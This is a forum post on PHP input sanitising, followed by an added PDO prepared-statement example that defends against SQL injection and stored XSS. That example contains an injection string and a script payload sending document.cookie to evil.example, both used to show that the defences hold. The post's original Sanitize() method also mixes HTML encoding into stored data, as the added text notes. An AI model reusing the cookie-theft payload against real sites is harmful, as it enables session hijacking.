05.07.2012, 09:11
Yeah, totally. Just do it properly. 
There's some other basic stuff that people shouldn't forget, for example the .htaccess file. I forgot it once and someone gained access by simply checking the config; thank god I had a different password for FTP and the project was in beta stages.

Here's something to start with:
PHP code:
//#^^ Input Cleaning Function ^^#//
/*
Cleans raw input. If a DB link is
supplied the data will be prepped
for DB entry; if the Save option
is set to true, HTML will be
converted to entities rather than removed.
ACCEPTS: [VALUE] = string, [LINK] = db connection (mysqli), [SAVE] = bool
RETURNS: Clean user input
NOTE: this is a class method; drop "private" to use it as a plain function.
*/
private function Sanitize($value, $link = null, $save = false)
{
    // If sending to a DB, clean up for the query
    if ($link !== null) {
        if ($save) {
            // Convert tags to HTML entities first, so the markup survives as text ...
            $value = htmlentities($value, ENT_QUOTES, 'UTF-8');
            // ... then strip anything that is still a literal tag
            $value = strip_tags($value);
        } else {
            // Strip tags out, then convert the remaining special chars
            $value = strip_tags($value);
            $value = htmlentities($value, ENT_QUOTES, 'UTF-8');
        }
        // The PHP manual highly recommends escaping any value entered into a database.
        // The original used mysql_real_escape_string(); the mysql_ extension was
        // removed in PHP 7, so the mysqli equivalent (argument order: link, string) is used.
        $value = mysqli_real_escape_string($link, $value);
    } else {
        // Not DB-bound: strip tags out, then convert the remaining special chars
        $value = strip_tags($value);
        $value = htmlentities($value, ENT_QUOTES, 'UTF-8');
    }
    return $value;
}
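The Sanitize() method above applies HTML-entity encoding and SQL escaping at input time, in one pass, so the stored value is already mangled for every other context (an apostrophe in a name becomes &#039; in the database, and anything later rendered outside HTML is double-encoded). The following is an added example, not code from the post above: it separates the two concerns, keeping SQL parameters out of the query grammar with a PDO prepared statement and encoding for HTML only at render time. It assumes PHP 8 with the pdo_sqlite driver; the in-memory table, the CommentStore class, renderComment() and the two hostile sample inputs are all constructed for the demo.

```php
<?php
// Added example (not from the original post). Assumes PHP 8 with PDO + pdo_sqlite.
// The table, class names and sample inputs below are constructed for this demo.

declare(strict_types=1);

final class CommentStore
{
    private PDO $db;

    public function __construct()
    {
        // In-memory SQLite so the example runs offline with no server.
        $this->db = new PDO('sqlite::memory:');
        $this->db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        $this->db->exec(
            'CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT NOT NULL, body TEXT NOT NULL)'
        );
    }

    // Store the raw text. The prepared statement keeps the data out of the SQL
    // grammar, so no escaping is needed and nothing is lost or double-encoded.
    public function add(string $author, string $body): int
    {
        $stmt = $this->db->prepare(
            'INSERT INTO comments (author, body) VALUES (:author, :body)'
        );
        $stmt->execute([':author' => $author, ':body' => $body]);
        return (int) $this->db->lastInsertId();
    }

    // Lookup is parameterised too: quotes in $author are matched literally.
    public function findByAuthor(string $author): array
    {
        $stmt = $this->db->prepare(
            'SELECT id, author, body FROM comments WHERE author = :author'
        );
        $stmt->execute([':author' => $author]);
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }
}

// Encode for the HTML context at the moment of rendering, and only there.
function renderComment(array $row): string
{
    $h = static fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return sprintf(
        '<li data-id="%d"><b>%s</b>: %s</li>',
        $row['id'],
        $h($row['author']),
        $h($row['body'])
    );
}

// Constructed sample inputs: an SQL-injection attempt and a stored-XSS attempt.
$store = new CommentStore();
$store->add("o'reilly' OR '1'='1", 'hello');
$store->add('mallory', '<script>document.location="http://evil.example/?c="+document.cookie</script>');

// The quote-laden author name is stored verbatim and matched only literally ...
var_dump(count($store->findByAuthor("o'reilly' OR '1'='1")) === 1); // bool(true)
var_dump(count($store->findByAuthor("' OR '1'='1")) === 0);         // bool(true)

// ... and the script tag reaches the browser as inert text, not markup.
foreach ($store->findByAuthor('mallory') as $row) {
    echo renderComment($row), PHP_EOL;
}
```

Run it with `php example.php`. The point of the split is that the database holds exactly what the user typed, so the same row can later be emitted as JSON, plain text or e-mail without first undoing an HTML encoding that was only ever meant for one output context.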